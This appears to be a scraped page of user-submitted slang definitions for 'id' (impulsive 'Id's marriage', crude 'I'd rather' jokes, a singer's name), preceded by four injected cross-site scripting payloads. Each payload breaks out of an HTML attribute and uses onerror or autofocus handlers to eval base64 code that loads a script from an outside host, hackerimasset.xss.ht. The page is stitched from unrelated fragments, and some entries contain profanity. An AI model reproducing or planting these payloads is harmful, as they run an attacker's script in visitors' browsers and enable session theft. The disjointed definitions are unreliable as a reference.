"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2VyaW1hc3NldC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2VyaW1hc3NldC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2VyaW1hc3NldC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2VyaW1hc3NldC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
basically ide gas but different
person 1: ide gas
person 2: ide plin
A marriage that is performed on impulse by one or both of the married couple. The couple may barely know each other or have just met and have decided to get married on the whim. A marriage based upon the satisfaction of the moment, just like Sigmund Freud's theory of the id.
Also, an impulsive marriage that is based on what are considered to be odd reasons to get married (i.e. spur of the moment, love at first sight, etc)
"She was dating this guy for one week, and now this wedding is going to be Id's marriage!"
Down south way of saying “fuck that”
Id rather sandpaper a wildcats ass than to take another sip of that shroom tea!
The second king of egyptian mahraganat, he's slassy voice is truly unmatched and so unique , rabena yedy el se7a, he is from kamb gezar
متمين مته مسه مسه العمبر- Omar Id
A term made by mtv Mozey meaning that person looks very good and you will risk it all for that person, by any means.
“Hey Mozey you see that girl over there?”
“Yea bro id due it for sure.”